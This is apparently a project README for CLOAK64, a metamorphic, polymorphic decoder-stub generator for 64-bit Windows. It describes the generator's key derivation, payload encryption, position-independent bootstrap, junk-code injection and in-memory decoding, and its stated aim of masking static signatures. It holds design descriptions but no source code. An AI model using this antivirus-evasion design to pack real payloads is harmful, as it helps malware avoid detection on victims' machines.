Warning
Use responsibly.
This project is licensed under the MIT License.
The author takes no liability for misuse, damage, or unintended consequences.
Note
Inspired by https://github.com/0xf00sec/Vx
┌──────────────────────────────────────────────────────────────────────────┐
│ CLOAK64 │
│ metamorphic decoder-stub generator │
└──────────────────────────────────────────────────────────────────────────┘
>> what is it?
CLOAK64 is a metamorphic code engine for x86_64 Windows that generates
unique decoder stubs with metamorphic characteristics. Each generation
produces functionally identical but different code.
[+] target: Windows 11 24H2 (build 26100), x64
────────────────────────────────────[ 0x01 ]─────────────────────────────────
>> what's in the box?
[+] PolymorphicEngine > decoder generator with metamorphic integration
[+] MetamorphicEngine > instruction variants (XOR/ADD/SUB/ROL)
[+] Bootstrap > 15–16 byte position-independent loader
[+] GenerateFibonacciKeys > entropy-seeded fibonacci key derivation
[+] Configure > register and algorithm selection
[+] MetamorphicPointer > INC vs ADD pointer advancement variants
[+] GenerateTrash > multi-pattern junk instruction injection
[+] EmitJnzBackToSaved > adaptable short/long jump emission
[+] ApplyEncryption > inverse algorithm payload encryption
[+] ResetGlobalState > state initialization with RDTSC entropy
────────────────────────────────────[ 0x02 ]────────────────────────────────
>> what does it do?
0x01: Generates RDTSC+Fibonacci cryptographic keys with entropy mixing
0x02: Configures metamorphic parameters (registers, algorithms, profiles)
0x03: Encrypts payload using inverse of selected decryption algorithm
0x04: Generates bootstrap loader (CALL/POP/LEA|ADD/JMP sequence)
0x05: Creates decoder loop with variable features
0x06: Applies metamorphic variants to algorithms
0x07: Outputs executable blob with "cloaked" signature patterns
────────────────────────────────────[ 0x03 ]────────────────────────────────
>> features
[+] Algorithms: XOR / ADD / SUB / ROL
0x01 sizes: XOR 2/6/10 | ADD 2/6/10 | SUB 2/6/10 | ROL 2/6
0x02 forms: Direct(2) OP [RDI], BL
Load-Op-Store(6) MOV AL,[RDI] / OP AL,BL / MOV [RDI],AL
Extended(10) LODSB / OP / STOSB
0x03 note: for ROL Direct use ROL byte [RDI], 1
[+] Crypto pairs: XOR <-> XOR; ADD -> SUB; SUB -> ADD; ROR -> ROL
[+] Metamorphism: same semantics, different instruction sequences
[+] Register selection: RegBase / RegCount / RegKey (auto-resolve)
[+] Keys: RDTSC + Fibonacci + transforms
[+] Addressing: CALL/POP (RIP-relative), full PIC
[+] Jumps: adaptive short/long selection
[+] Pointer advance: INC RDI | ADD RDI,1
[+] Junk injection: NOPs, reg ops, PUSH/POP (multi-pattern)
[+] Bootstrap: 15–16 bytes (validated)
[+] Layout: 64-byte key section; three-layer architecture
[+] Entropy output: masks static signatures
[+] Dependencies: bootstrap has no API calls
[+] Errors: LastErrorCode tracking
[+] Size limits: decoder <= 8 KB; payload <= 64 KB; scratch <= 16 KB
────────────────────────────────────[ 0x04 ]────────────────────────────────
>> execution flow:
BUILD-TIME GENERATION
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x01 Generate Keys │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: RDTSC entropy + Fibonacci math │
│ 0x02: Makes UserKey / PrimaryKey / SecondaryKey │
│ 0x03: Seeds PRNG for subsequent operations │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x02 Configure Engine │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: Select RegBase (RBX/RDX/RSI/RDI) │
│ 0x02: Select RegCount (avoids RegBase) │
│ 0x03: Select RegKey (avoids both) │
│ 0x04: Select Algorithm index (0-3) │
│ 0x05: Select Metamorphic profile (0-7) │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x03 ApplyEncryption │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: XOR -> XOR with rolling key │
│ 0x02: ADD -> ADD with rolling key (decrypt via SUB) │
│ 0x03: SUB -> SUB with rolling key (decrypt via ADD) │
│ 0x04: ROR -> ROR 1 bit per byte (decrypt via ROL) │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x04 Generate Bootstrap │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: CALL next / POP RAX (RIP discovery) │
│ 0x02: Choose LEA or ADD form (randomized) │
│ 0x03: Set RDI pointer │
│ 0x04: JMP RAX -> decoder │
│ 0x05: Size must be exactly 15-16 bytes │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x05 PolymorphicEngine │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: Initialize key (MOV r64, imm64) │
│ 0x02: RIP calc via CALL/POP │
│ 0x03: LEA decoder address │
│ 0x04: MOV payload size -> counter │
│ 0x05: Metamorphic decode loop │
│ 0x06: Trash code injection │
│ 0x07: Pointer increment: INC RDI or ADD RDI, 1 │
│ 0x08: DEC/JNZ loop; RET -> decrypted payload │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x06 Assemble Final Layout │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: Layout = [Bootstrap 15-16B][Key 64B][Decoder var][Encrypted Payload] │
│ 0x02: Patch displacements (jumps / LEA) │
│ 0x03: Validate total size │
│ 0x04: Return engine size (or 0 on error) │
└──────────────────────────────────────────────────────────────────────────┘
RUNTIME EXECUTION FLOW
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x01 Bootstrap (15-16 bytes) │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: CALL/POP RIP │
│ 0x02: LEA or ADD adjust │
│ 0x03: MOV RDI, RAX (setup pointer) │
│ 0x04: JMP RAX (enter decoder) │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x02 Decoder │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: MOV RBX, transformed_key │
│ 0x02: CALL/POP; LEA base; MOV RDI, base │
│ 0x03: MOV RCX, payload_size │
│ 0x04: Loop step 0x01: decode op (variant) │
│ 0x05: Loop step 0x02: ROL RBX, 1 (key evolve) │
│ 0x06: Loop step 0x03: insert junk │
│ 0x07: Loop step 0x04: pointer INC RDI or ADD RDI, 1 │
│ 0x08: Loop step 0x05: DEC RCX; JNZ loop_start │
│ 0x09: RET -> payload │
└──────────────────────────────────────────────────────────────────────────┘
│
v
┌──────────────────────────────────────────────────────────────────────────┐
│ 0x03 Decrypted Payload │
├──────────────────────────────────────────────────────────────────────────┤
│ 0x01: Restored in memory │
│ 0x02: Obfuscation removed │
│ 0x03: Original code executes │
└──────────────────────────────────────────────────────────────────────────┘
EOF